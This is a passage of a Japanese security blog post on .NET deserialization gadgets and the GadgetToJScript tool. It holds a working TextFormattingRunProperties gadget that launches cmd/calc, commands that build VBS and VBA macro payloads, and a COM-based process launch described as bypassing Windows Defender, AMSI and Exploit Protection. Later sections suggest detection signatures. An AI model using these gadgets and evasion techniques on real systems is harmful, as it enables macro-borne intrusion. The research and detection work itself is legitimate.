<p><img src="images/d2j_code.png" alt="d2j_code"></p>
<p>コードの通り、Base64エンコードした .NET オブジェクトを COM コンポーネント経由でデシアライズしています。デシアライズしたクラスオブジェクトを D/Invoke でインスタンス作成し、 .NET オブジェクトのコンストラクタが実行されます。</p>
<p>デシアライズの起点となるのは <code>BinaryFormatter</code> です。</p>
<blockquote>
<p>セキュリティの面からみても、このように外部からのパラメータを BinaryFormatter に与えることがいかに危険な行為かがお分かりいただけるでしょうか。</p>
<p><a href="https://www.security-next.com/119815">中国系サイバーグループが攻撃に悪用している脆弱性</a>のリストにもあげられている Microsoft Exchange Server の脆弱性 (CVE-2020-0688) も、外部から渡される _VIEWSTATE パラメータの値をデシアライズするという実装が脆弱性の原因となりました。</p>
<blockquote>
<p><a href="https://jp.tenable.com/blog/cve-2020-0688-microsoft-exchange-server-static-key-flaw-could-lead-to-remote-code-execution">https://jp.tenable.com/blog/cve-2020-0688-microsoft-exchange-server-static-key-flaw-could-lead-to-remote-code-execution</a></p>
</blockquote>
</blockquote>
<p>このスクリプトのデシアライズ自体に大きな問題はないのですが、気になるのはビルダー側でシリアライズするコードです。以下は D2JS の Program.cs です。</p>
<div class="highlight"><pre class="chroma"><code class="language-csharp" data-lang="csharp"><span class="kt">byte</span><span class="p">[]</span> <span class="n">assembly</span> <span class="p">=</span> <span class="n">File</span><span class="p">.</span><span class="n">ReadAllBytes</span><span class="p">(</span><span class="n">assembly_path</span><span class="p">);</span>
<span class="p">(..</span><span class="n">snip</span><span class="p">..)</span>
<span class="n">BinaryFormatter</span> <span class="n">fmt</span> <span class="p">=</span> <span class="k">new</span> <span class="n">BinaryFormatter</span><span class="p">();</span>
<span class="n">MemoryStream</span> <span class="n">stm</span> <span class="p">=</span> <span class="k">new</span> <span class="n">MemoryStream</span><span class="p">();</span>
<span class="n">fmt</span><span class="p">.</span><span class="n">Serialize</span><span class="p">(</span><span class="n">stm</span><span class="p">,</span> <span class="n">mscorlib_only</span> <span class="p">?</span> <span class="n">BuildLoaderDelegateMscorlib</span><span class="p">(</span><span class="n">assembly</span><span class="p">)</span> <span class="p">:</span> <span class="n">BuildLoaderDelegate</span><span class="p">(</span><span class="n">assembly</span><span class="p">));</span>
</code></pre></div><p>見ての通り、このコードは ObjectSurrogate で任意にシリアライズされる前提で、何の考慮もせずにシリアライズしています。</p>
<p>D2JS はリリース当時、クロスプラットフォームで .NET プログラムを読み込める便利ツールとして非常に使われていましたが、先述の通り .NET 4.8 での ObjectSurrogate.GetObjectData の変更によって、最新の Windows 10, Windows Server では動作しなくなりました。</p>
<h3 id="ysoserialnet-とガジェットチェーン">ysoserial.net とガジェットチェーン</h3>
<p>話は変わってガジェットチェーンの話。D2JS とは別の成果として、Java の ysoserial に触発された <a href="https://github.com/pwntester/ysoserial.net">ysoserial.net</a> プロジェクトにおいて、.NET プログラムを複数のクラスを経由して読み込むガジェットチェーンがいくつか発見されていました。</p>
<p>中でも使いやすいガジェットチェーンとして <a href="https://community.microfocus.com/t5/Security-Research-Blog/New-NET-deserialization-gadget-for-compact-payload-When-size/ba-p/1763282">MicroFocus のブログ</a> で提案された、<code>TextFormattingRunProperties</code> ガジェットがあげられます。このガジェットの利点はガジェットペイロードのフットプリントが小さいことです。</p>
<h4 id="textformattingrunproperties-で-cmdexe-の実行">TextFormattingRunProperties で cmd.exe の実行</h4>
<p><a href="https://docs.microsoft.com/en-us/dotnet/api/microsoft.visualstudio.text.formatting.textformattingrunproperties?view=visualstudiosdk-2019">TextFormattingRunProperties</a> はテキストフォーマットの書式設定に関する情報を保持するクラスです。このクラスは Serializable アトリビュートを付与されているため<code>DisableActivitySurrogateSelectorTypeCheck </code>には引っかからずにデシアライズが可能です。また本クラスの ForegroundBrush プロパティは xaml 形式で定義が可能なので、任意のオブジェクトをソースコードに記載できコンパクトな形で実装できます。</p>
<p>以下は  TextFormattingRunProperties を利用して xaml で定義されたオブジェクトをデシアライズさせ、電卓を実行するコードです。</p>
<div class="highlight"><pre class="chroma"><code class="language-csharp" data-lang="csharp"><span class="k">using</span> <span class="nn">System</span><span class="p">;</span>
<span class="k">using</span> <span class="nn">System.IO</span><span class="p">;</span>
<span class="k">using</span> <span class="nn">System.Runtime.Serialization</span><span class="p">;</span>
<span class="k">using</span> <span class="nn">System.Runtime.Serialization.Formatters.Binary</span><span class="p">;</span>
<span class="k">using</span> <span class="nn">System.Configuration</span><span class="p">;</span>

<span class="cm">/**
</span><span class="cm">    Ref:
</span><span class="cm">    https://community.microfocus.com/t5/Security-Research-Blog/New-NET-deserialization-gadget-for-compact-payload-When-size/ba-p/1763282
</span><span class="cm">**/</span>
<span class="na">
</span><span class="na">[Serializable]</span>
<span class="k">public</span> <span class="k">class</span> <span class="nc">TextFormattingRunPropertiesMarshal</span> <span class="p">:</span> <span class="n">ISerializable</span>
<span class="p">{</span>
    <span class="kt">string</span> <span class="n">_xaml</span><span class="p">;</span>
    <span class="k">public</span> <span class="k">void</span> <span class="n">GetObjectData</span><span class="p">(</span><span class="n">SerializationInfo</span> <span class="n">info</span><span class="p">,</span> <span class="n">StreamingContext</span> <span class="n">context</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">Type</span> <span class="n">t</span> <span class="p">=</span> <span class="n">Type</span><span class="p">.</span><span class="n">GetType</span><span class="p">(</span><span class="s">&#34;Microsoft.VisualStudio.Text.Formatting.TextFormattingRunProperties, Microsoft.PowerShell.Editor, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35&#34;</span><span class="p">);</span>
        <span class="n">info</span><span class="p">.</span><span class="n">SetType</span><span class="p">(</span><span class="n">t</span><span class="p">);</span>
        <span class="n">info</span><span class="p">.</span><span class="n">AddValue</span><span class="p">(</span><span class="s">&#34;ForegroundBrush&#34;</span><span class="p">,</span> <span class="n">_xaml</span><span class="p">);</span>
    <span class="p">}</span>
    <span class="k">public</span> <span class="n">TextFormattingRunPropertiesMarshal</span><span class="p">(</span><span class="kt">string</span> <span class="n">xaml</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">_xaml</span> <span class="p">=</span> <span class="n">xaml</span><span class="p">;</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="k">class</span> <span class="nc">Program</span>
<span class="p">{</span>    
    <span class="k">static</span> <span class="k">void</span> <span class="n">Main</span><span class="p">()</span>
    <span class="p">{</span>
        <span class="kt">string</span> <span class="n">xaml_payload</span> <span class="p">=</span> <span class="s">@&#34;&lt;ResourceDictionary
</span><span class="s">        xmlns=&#34;&#34;http://schemas.microsoft.com/winfx/2006/xaml/presentation&#34;&#34;
</span><span class="s">        xmlns:x = &#34;&#34;http://schemas.microsoft.com/winfx/2006/xaml&#34;&#34;
</span><span class="s">        xmlns:System = &#34;&#34;clr-namespace:System;assembly=mscorlib&#34;&#34;
</span><span class="s">        xmlns:Diag = &#34;&#34;clr-namespace:System.Diagnostics;assembly=system&#34;&#34;&gt;
</span><span class="s"> 
</span><span class="s">        &lt;ObjectDataProvider x:Key = &#34;&#34;Calc&#34;&#34; ObjectType = &#34;&#34;{x:Type Diag:Process}&#34;&#34; MethodName = &#34;&#34;Start&#34;&#34;&gt;  
</span><span class="s">            &lt;ObjectDataProvider.MethodParameters&gt;
</span><span class="s">                &lt;System:String&gt;cmd&lt;/System:String&gt;
</span><span class="s">                &lt;System:String&gt;/c calc&lt;/System:String&gt;
</span><span class="s">            &lt;/ObjectDataProvider.MethodParameters&gt;
</span><span class="s">        &lt;/ObjectDataProvider&gt;
</span><span class="s">        &lt;/ResourceDictionary&gt;&#34;</span><span class="p">;</span>

        <span class="n">TextFormattingRunPropertiesMarshal</span> <span class="n">payload</span> <span class="p">=</span> <span class="k">new</span> <span class="n">TextFormattingRunPropertiesMarshal</span><span class="p">(</span><span class="n">xaml_payload</span><span class="p">);</span>
        <span class="n">BinaryFormatter</span> <span class="n">fmt</span> <span class="p">=</span> <span class="k">new</span> <span class="n">BinaryFormatter</span><span class="p">();</span>
        <span class="n">MemoryStream</span> <span class="n">stm</span> <span class="p">=</span> <span class="k">new</span> <span class="n">MemoryStream</span><span class="p">();</span>
        <span class="n">fmt</span><span class="p">.</span><span class="n">Serialize</span><span class="p">(</span><span class="n">stm</span><span class="p">,</span> <span class="n">payload</span><span class="p">);</span>
        <span class="n">stm</span><span class="p">.</span><span class="n">Position</span> <span class="p">=</span> <span class="m">0</span><span class="p">;</span>

        <span class="n">fmt</span><span class="p">.</span><span class="n">Deserialize</span><span class="p">(</span><span class="n">stm</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div><p>このコードでは ForegroundBrush プロパティに xaml オブジェクトを代入させシリアライズを行っています。</p>
<p>これをコンパイルして実行したとき、<code>Process.Start(&quot;cmd.exe /c calc.exe&quot;)</code> が定義された xaml テキストがデシアライズされ、電卓が起動しました。</p>
<p><img src="images/deserialize2_ok.png" alt="deserialize2_ok"></p>
<p>なお実行時は例外が発生します。</p>
<h4 id="なぜ-foregroundbrush-">なぜ ForegroundBrush ？</h4>
<p>TextFormattingRunProperties を使ったデシリアライズは、なぜ ForegroundBrush を利用するのでしょうか？他のプロパティではダメなのでしょうか？この疑問を解決する記述がどこにも見当たらなかったため、私は TextFormattingRunProperties の実装を確認することにしました。</p>
<p>WinDbg でコンパイルした実行ファイルをデバッグすると、TextFormattingRunProperties は <code>Microsoft.PowerShell.Editor.dll</code> で実装されていることがわかります。次に dll のファイルパスを調べたところ、私の環境では以下に位置していました。</p>
<p><code>C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Editor\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Editor.dll</code></p>
<p>これを dnSpy でデコンパイルし、該当箇所を探します。</p>
<p><img src="images/dec_TextFormattingRunProperties.png" alt="dec_TextFormattingRunProperties"></p>
<p>コンストラクタを見れば一目瞭然でした。コンストラクタのプロパティの初期化が ForegroundBrush から始まっています。コンストラクタ実行時に真っ先に ForegroundBrush のデシアライズが行われますが、そこで xaml で仕込んだ <code>Process.Start</code> が実行されます。当然 Brush クラスの正しいオブジェクトではないので例外が発生しますが、例外発生前に Process.Start は実行されているので問題ありません。</p>
<p>なお xaml で正しい ForegroundBrush プロパティを実装すれば次に初期化される BackgroundBrush で任意のオブジェクト定義を行うことも可能ですが、コンパクトに任意オブジェクトをシリアライズしたいならやはり ForegroundBrush で仕込む必要があるということです。</p>
<p>また正しくないデシアライズによって例外が発生しコンストラクタが中断されるため、複数プロパティについて AddValue() で xaml を定義し同時に複数オブジェクトをデシリアライズするのは難しいこともわかります。</p>
<h2 id="gadgettojscript-の登場">GadgetToJScript の登場</h2>
<p>D2JS が .NET 4.8 の変更で使えなくなったあと、 D2J の作者である Nick 氏 によって、TextFormattingRunProperties ガジェットを利用し <code>DisableActivitySurrogateSelectorTypeCheck</code> を true にするという XAML 形式のオブジェクトが<a href="https://silentbreaksecurity.com/re-animating-activitysurrogateselector/">作成され</a>、 ysoserial.net にマージされました。このマージされたコードをもとに作成したのが、改良版 D2JS ともいえる <a href="https://github.com/med0x2e/GadgetToJScript"><strong>GadgetToJScript</strong></a> です。</p>
<blockquote>
<p>任意のオブジェクトをデシアライズするために .NET のガジェットチェーンを使っているから Gadget が名称についているのでしょう。</p>
</blockquote>
<h3 id="g2js-の実装">G2JS の実装</h3>
<p>G2JS で生成されたスクリプトの最初の動作として、.NET 4.8 以降の環境で実行させるときは初めに TextFormattingRunProperties ガジェットを経由して .NET 4.8 で変更されたデシアライズ時の型チェックを無効にします (stage1)。そして次にユーザが指定した .NET プログラムをデシアライズします (stage2)。</p>
<p>つまりデシアライズを2回行うようになりました。</p>
<p><img src="images/g2js_scructure.png" alt="g2js_scructure"></p>
<p>ただ D2JS も G2JS も、.NET プログラムを読み込む起点はどちらも BinaryFormatter を利用しているため、これらのツールによって生成されるスクリプトに大きな違いはありません。</p>
<h2 id="ウォークスルー">ウォークスルー</h2>
<p><strong>G2JS で生成されたスクリプトはそのままだと Windows Defender のリアルタイムスキャンで検知されるので、検証される方はあらかじめオフにしてください。</strong></p>
<p>テストコードとして、メッセージボックスを表示するだけの C# プログラムを作成します。</p>
<div class="highlight"><pre class="chroma"><code class="language-csharp" data-lang="csharp"><span class="k">using</span> <span class="nn">System</span><span class="p">;</span>
<span class="k">using</span> <span class="nn">System.Windows.Forms</span><span class="p">;</span>

<span class="k">namespace</span> <span class="nn">Test</span>
<span class="p">{</span>
    <span class="k">public</span> <span class="k">class</span> <span class="nc">Program</span>
    <span class="p">{</span>
		<span class="k">public</span> <span class="n">Program</span><span class="p">()</span>
		<span class="p">{</span>
			<span class="n">MessageBox</span><span class="p">.</span><span class="n">Show</span><span class="p">(</span><span class="s">&#34;Hello, World!&#34;</span><span class="p">);</span>
		<span class="p">}</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div><p>ここで大事なのはパブリッククラスであること、クラスのコンストラクタを実装することです。</p>
<p>ファイルを hello.cs として保存します。</p>
<h3 id="g2js-in-vbscript">G2JS in VBScript</h3>
<p>インプットファイルとして hello.cs を指定して G2J を実行し、vbs ファイルを生成します。</p>
<pre><code>&gt; GadgetToJScript.exe -b -w vbs -c hello.cs -o test -d System.dll -d System.Windows.Forms.dll
[+]: Generating the vbs payload
[+]: First stage gadget generation done.
[+]: Compiling your .NET code located at:hello.cs
[+]: Second stage gadget generation done.
[*]: Payload generation completed, check: test.vbs
</code></pre><p>test.vbs が生成されているので、ダブルクリックすると、メッセージボックスが表示されます。</p>
<p><img src="images/g2j_hello.png" alt="g2j_hello"></p>
<h3 id="g2js-in-vba">G2JS in VBA</h3>
<p>次は VBA で実行してみます。</p>
<pre><code>&gt; GadgetToJScript.exe -b -w vba -c hello.cs -o test -d System.dll -d System.Windows.Forms.dll
</code></pre><p><img src="images/g2js_vba_hello.png" alt="g2js_vba_hello"></p>
<p>Office VBA 上でも .NET プログラムを実行することができました。</p>
<p>2020/10 現時点においては .NET プログラムが読み込まれるまでの処理で AMSI トリガーとなるメソッドが含まれていないため、G2JS を使った侵害は AMSI バイパスとなりえます。</p>
<p><img src="images/g2js_amsitrigger.png" alt="g2js_amsitrigger"></p>
<blockquote>
<p>図の通り、G2JS ではデシリアライズ後に最終的に Assembly.Load によって .NET プログラムが読み込まれるため、clr.dll による AmsiScanBuffer がコールされます。そのため RedTeaming 時は別途 .NET プログラム上で難読化などの検知回避が必要です。</p>
</blockquote>
<h3 id="g2js--com-オブジェクトを利用した別プロセスの起動--enable-windows-defener">G2JS + COM オブジェクトを利用した別プロセスの起動  (Enable Windows Defener)</h3>
<p>G2JS を使えばどんな .NET プログラムも実行することができますが、今回は VBA 単体だと AMSI + Windows Defender によって検知されてしまう、COM オブジェクトを使ったプロセス生成にチャレンジしてみます。</p>
<p>下記の C# コードを用いて、G2JS でスクリプトを生成します。</p>
<div class="highlight"><pre class="chroma"><code class="language-csharp" data-lang="csharp"><span class="p">(..</span><span class="n">snip</span><span class="p">..)</span>
<span class="n">System</span><span class="p">.</span><span class="n">Type</span> <span class="n">com</span> <span class="p">=</span> <span class="n">Type</span><span class="p">.</span><span class="n">GetTypeFromCLSID</span><span class="p">(</span><span class="n">Guid</span><span class="p">.</span><span class="n">Parse</span><span class="p">(</span><span class="s">&#34;9BA05972-F6A8-11CF-A442-00A0C90A8F39&#34;</span><span class="p">),</span> <span class="s">&#34;127.0.0.1&#34;</span><span class="p">);</span>
<span class="kt">dynamic</span> <span class="n">obj</span> <span class="p">=</span> <span class="n">System</span><span class="p">.</span><span class="n">Activator</span><span class="p">.</span><span class="n">CreateInstance</span><span class="p">(</span><span class="n">com</span><span class="p">);</span>
<span class="n">obj</span><span class="p">.</span><span class="n">Item</span><span class="p">().</span><span class="n">Document</span><span class="p">.</span><span class="n">Application</span><span class="p">.</span><span class="n">ShellExecute</span><span class="p">(</span><span class="s">&#34;notepad.exe&#34;</span><span class="p">,</span><span class="s">&#34;&#34;</span><span class="p">,</span><span class="s">&#34;&#34;</span><span class="p">,</span><span class="s">&#34;open&#34;</span><span class="p">,</span> <span class="m">1</span><span class="p">);</span>
<span class="p">(..</span><span class="n">snip</span><span class="p">..)</span>
</code></pre></div><p>ただし生成したスクリプトをそのまま動かすと Windows Defender によって検知されます。そこで独自にカスタマイズした難読化ツールで難読化し、実行してみます。</p>
<blockquote>
<p>難読化ツールの詳細については詳細を控えます。</p>
</blockquote>
<p><img src="images/g2js_com_evation.png" alt="g2js_com_evation"></p>
<p>マクロを有効にすると、.NET プログラムが実行され、親プロセスが explorer.exe であるメモ帳が起動しました。Office プロセスのメモリ上に .NET プログラムが読み込まれていることが確認できます。</p>
<p>以上のように Windows Defender および クラウド保護を有効にした状態、かつ Exploit Protection による子プロセス不許可が有効な状態であっても、全てをバイパスして子プロセスを生成することが可能です。</p>
<h1 id="対策">対策</h1>
<p>G2JS のデシアライズ手法を用いて .NET プログラムを読み込むことで、Office プロセス内で VBA の領域を離れて侵害が可能であることを実証しました。</p>
<p>この手法はあくまで VBA の仕様内で実現されるため、<strong>マクロを無効にする以外の有効な防止策はありません</strong>。</p>
<p>なお COM オブジェクト経由で .NET を利用している関係上、VBA を動かしているプロセス(今回は EXCEL.EXE)は clr.dll が呼ばれます。これにより ProcessHacker でプロセスを確認すると .NET 関連のタブが表示されるようになりますが、そもそも VBA で .NET Framework を利用するシーンはたくさんあるため、これは何のインジケータにもなりません。</p>
<p><img src="images/g2js_vba_excel_ph.png" alt="g2js_vba_excel_ph"></p>
<h2 id="検知">検知</h2>
<p>ただし G2JS にも弱点は存在します。それは、デシアライズするために必須なメソッドが特徴的である点です。</p>
<p>.NET プログラムをデシアライズするために必須なコードは以下です。</p>
<ul>
<li><code>actCtx.ManifestText = manifest</code>
<ul>
<li>COM オブジェクトを登録せずに .NET オブジェクトを利用するために必須</li>
</ul>
</li>
<li><code>stm_1.WriteByte</code>
<ul>
<li>BinaryFormatter.Deserialize() の引数は Stream クラスが必要であり、MemoryStream にバイト配列を書き込むために必須</li>
</ul>
</li>
<li><code>fmt_1.Deserialize_2(stm_1)</code>
<ul>
<li>.NET プログラムのデシリアライズに必須</li>
</ul>
</li>
</ul>
<p>これらのメソッド呼び出しは PowerShell のように簡単に難読化できるものではありません。そのため、文字列や変数名のみの簡易的な難読化であれば、以下のようにメソッド名が残ります。</p>
<div class="highlight"><pre class="chroma"><code class="language-vb" data-lang="vb"><span class="n">pmfrxyltsrzjjj</span><span class="p">.</span><span class="n">ManifestText</span> <span class="o">=</span> <span class="n">djsktksnmbak</span>
<span class="n">lzadypxlktswisq</span><span class="p">.</span><span class="n">WriteByte</span> <span class="n">i</span>
<span class="k">Set</span> <span class="n">gmjxujigkjmudfmhkfzb</span> <span class="o">=</span> <span class="n">xaobbncueaofydar</span><span class="p">.</span><span class="n">Deserialize_2</span><span class="p">(</span><span class="n">lzadypxlktswisq</span><span class="p">)</span>
</code></pre></div><p>単体で利用した場合にはともかく、1つの VBA 内でこれら 3 つが同時に利用されるパターンは .NET プログラムのデシアライズを意図していると判断できるため、検知に有用と考えます。</p>
<p>また、Microsoft がこれらのメソッド名について AMSI トリガーを実装してしまえば、攻撃者側が以下のリフレクション手法を使っても動的解析で検知できる可能性が高いと考えられます。</p>
<h3 id="リフレクションによる難読化について">リフレクションによる難読化について</h3>
<p>VBA にも貧弱ながらリフレクションが存在し、より高度な難読化が可能です。 <a href="https://docs.microsoft.com/ja-jp/office/vba/language/reference/user-interface-help/callbyname-function">CallByName</a> です。例えば <code>fmt_1.Deserialize_2(stm_1)</code> についてはリフレクションを用いることで以下のように記載可能です。</p>
<div class="highlight"><pre class="chroma"><code class="language-vb" data-lang="vb"><span class="k">Set</span> <span class="n">o1</span> <span class="o">=</span> <span class="n">CallByName</span><span class="p">(</span><span class="n">fmt_1</span><span class="p">,</span> <span class="s">&#34;Deserialize_2&#34;</span><span class="p">,</span> <span class="n">VbMethod</span><span class="p">,</span> <span class="n">stm_1</span><span class="p">)</span>
</code></pre></div><p>このコードを文字列を別変数に代入し難読化すると、以下になります。</p>
<div class="highlight"><pre class="chroma"><code class="language-vb" data-lang="vb"><span class="k">Set</span> <span class="n">cuzmicydpdcpnjnkcl</span> <span class="o">=</span> <span class="n">CallByName</span><span class="p">(</span><span class="n">ygftmlcabsflnu</span><span class="p">,</span> <span class="n">wsxfcgrolbfpixsfcosr</span><span class="p">,</span> <span class="n">idasmadwe</span><span class="p">,</span> <span class="n">htzojnmestlccsdkpcns</span><span class="p">)</span>
</code></pre></div><p>このとおり、<code>Deserialize_2</code> の文字列がなくなりました。動的解析を行えば最終的に復元されますが、本メソッド名は現時点では AMSI トリガーに含まれないため AMSI プロバイダに渡されず、検知されません。</p>
<h4 id="callbyname-の悪性度">CallByName の悪性度</h4>
<p>リフレクションを用いることで静的解析での検知は難しくなりました。ただしこの手法だと、リフレクション特有のメソッド <code>CallByName</code> がコード中に現れます。</p>
<p><a href="https://jglobal.jst.go.jp/detail?JGLOBAL_ID=201802212058348458">三浦氏らの論文</a>によると、CallByName の悪性マクロでの出現率は 51.3% に対して、良性マクロでの出現率は 0.1% とされます。</p>
<p><img src="images/benign_macro_point.png" alt="benign_macro_point"></p>
<p>このことから、リフレクションによる難読化を使われてしまうとコードの静的解析による G2JS 特有の検知を行うことはできませんが、いくつかの検知手法と組み合わせることで汎用的に悪性マクロを検知できるものと考えます。</p>
<h1 id="まとめ">まとめ</h1>
<p>任意の .NET プログラムをデシリアライズして読み込む原理と、それを利用して Windows Script Host (WSH) 上で読み込む GadgetToJScript の実装を解説しました。</p>
<p>D2JS の対策とアンチウイルスベンダーの検知技術の向上により現在の Red Teming ではそもそも VBA をあまり使わない方法にシフトしつつある気もしますが、G2JS を有効に使うアクターはこれからも存在し続けるはずです。この記事が助けになれば幸いです。</p>
<h1 id="reference">Reference</h1>
<ul>
<li>Office VBA + AMSI: Parting the veil on malicious macros
<ul>
<li><a href="https://www.microsoft.com/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/">https://www.microsoft.com/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/</a></li>
</ul>
</li>
<li>Advanced TTPs – DotNetToJScript (Part 1)
<ul>
<li><a href="https://www.whiteoaksecurity.com/2020-1-16-advanced-ttps-dotnettojscript-part-1/">https://www.whiteoaksecurity.com/2020-1-16-advanced-ttps-dotnettojscript-part-1/</a></li>
</ul>
</li>
<li>GadgetToJScript
<ul>
<li><a href="https://github.com/med0x2e/GadgetToJScript">https://github.com/med0x2e/GadgetToJScript</a></li>
</ul>
</li>
<li>Exploiting .NET Managed DCOM
<ul>
<li><a href="https://googleprojectzero.blogspot.com/2017/04/">https://googleprojectzero.blogspot.com/2017/04/</a></li>
</ul>
</li>
<li>Re-Animating ActivitySurrogateSelector
<ul>
<li><a href="https://silentbreaksecurity.com/re-animating-activitysurrogateselector/">https://silentbreaksecurity.com/re-animating-activitysurrogateselector/</a></li>
</ul>
</li>
<li>ysoserial.net
<ul>
<li><a href="https://github.com/pwntester/ysoserial.net">https://github.com/pwntester/ysoserial.net</a></li>
</ul>
</li>
<li>New .NET deserialization gadget for compact payload. When size matters
<ul>
<li><a href="https://community.microfocus.com/t5/Security-Research-Blog/New-NET-deserialization-gadget-for-compact-payload-When-size/ba-p/1763282">https://community.microfocus.com/t5/Security-Research-Blog/New-NET-deserialization-gadget-for-compact-payload-When-size/ba-p/1763282</a></li>
</ul>
</li>
<li>Bag-of-wordsを用いた悪性マクロの検知手法の提案
<ul>
<li><a href="https://jglobal.jst.go.jp/detail?JGLOBAL_ID=201802212058348458">https://jglobal.jst.go.jp/detail?JGLOBAL_ID=201802212058348458</a></li>
</ul>
</li>
<li>AMSI-Bypass
<ul>
<li><a href="https://github.com/synacktiv/AMSI-Bypass">https://github.com/synacktiv/AMSI-Bypass</a></li>
</ul>
</li>
</ul>

                    </div>
                    
                    
                    <div class="after-post-tags">
                        <ul class="tags">
                        
                        <li>
                        <a href="/tags/pentest">pentest</a>
                        </li>
                        
                        <li>
                        <a href="/tags/bypass">bypass</a>
                        </li>
                        
                        </ul>
                    </div>
                    
                    
                    
                    <div class="row PageNavigation d-flex justify-content-between font-weight-bold">
                    
                    
                        <a class="d-block col-md-6 text-lg-right" href="https://www.shutingrz.com/post/dig-coincheck/">コインチェックのドメインハイジャックの手法を調査した &raquo;</a>
                    
                    <div class="clearfix"></div>
                    </div>
                    
                </div>
                
            </div>
        </div>
        
        
    </div>


            </div>
<div class="jumbotron fortags">
	<div class="d-md-flex h-100">
		<div class="col-md-4 transpdark align-self-center text-center h-100">
			<div class="d-md-flex align-items-center justify-content-center h-100">
				<h2 class="d-md-block d-none align-self-center py-1 font-weight-light">Explore <span class="d-none d-md-inline">→</span></h2>
			</div>
		</div>
		<div class="col-md-8 p-5 align-self-center text-center">
			
			<a class="mt-1 mb-1" href="/tags/bypass">bypass</a>
			
			<a class="mt-1 mb-1" href="/tags/car-security">car-security</a>
			
			<a class="mt-1 mb-1" href="/tags/develop">develop</a>
			
			<a class="mt-1 mb-1" href="/tags/dns">dns</a>
			
			<a class="mt-1 mb-1" href="/tags/ethical_hacking">ethical_hacking</a>
			
			<a class="mt-1 mb-1" href="/tags/exploit">exploit</a>
			
			<a class="mt-1 mb-1" href="/tags/intelligence">intelligence</a>
			
			<a class="mt-1 mb-1" href="/tags/misc">misc</a>
			
			<a class="mt-1 mb-1" href="/tags/pentest">pentest</a>
			
			<a class="mt-1 mb-1" href="/tags/priv_escalation">priv_escalation</a>
			
			<a class="mt-1 mb-1" href="/tags/web">web</a>
			
			<a class="mt-1 mb-1" href="/tags/%E4%BB%AE%E6%83%B3%E9%80%9A%E8%B2%A8">仮想通貨</a>
			
			<a class="mt-1 mb-1" href="/tags/%E8%87%AA%E4%BD%9C%E4%BB%AE%E6%83%B3%E9%80%9A%E8%B2%A8%E5%85%A5%E9%96%80">自作仮想通貨入門</a>
			
		</div>
	</div>
</div>

<footer class="footer">
    <div class="container">
        <div class="row">
            <div class="col-md-6 col-sm-6 text-center text-lg-left">
                &copy; Copyright shutingrz - All rights reserved / 本サイトではアクセス解析に Google Analytics を利用しています。
            </div>
            <div class="col-md-6 col-sm-6 text-center text-lg-right">    
                <a target="_blank" rel="noopener" href="https://www.wowthemes.net">Mediumish Theme</a> by WowThemes.net
            </div>
        </div>
    </div>
</footer>


        </div>


<script src="https://code.jquery.com/jquery-3.4.1.min.js"></script>
    
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.6/umd/popper.min.js" integrity="sha384-wHAiFfRlMFy6i5SRaxvfOCifBUQy1xHdJ/yoi7FRNXMRBu5WHdZYu1hA6ZOblgut" crossorigin="anonymous"></script>

<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js" integrity="sha384-JjSmVgyd0p3pXB1rRibZUAYoIIy6OrQ6VrjIEaFf/nJGzIxFDsf4x0xIM+B07jRM" crossorigin="anonymous"></script>

<script src="/js/mediumish.js"></script>

<script type="application/javascript">
var doNotTrack = false;
if (!doNotTrack) {
	(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
	(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
	m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
	})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
	ga('create', 'UA-137567513-1', 'auto');
	
	ga('send', 'pageview');
}
</script>

    </body>
</html>
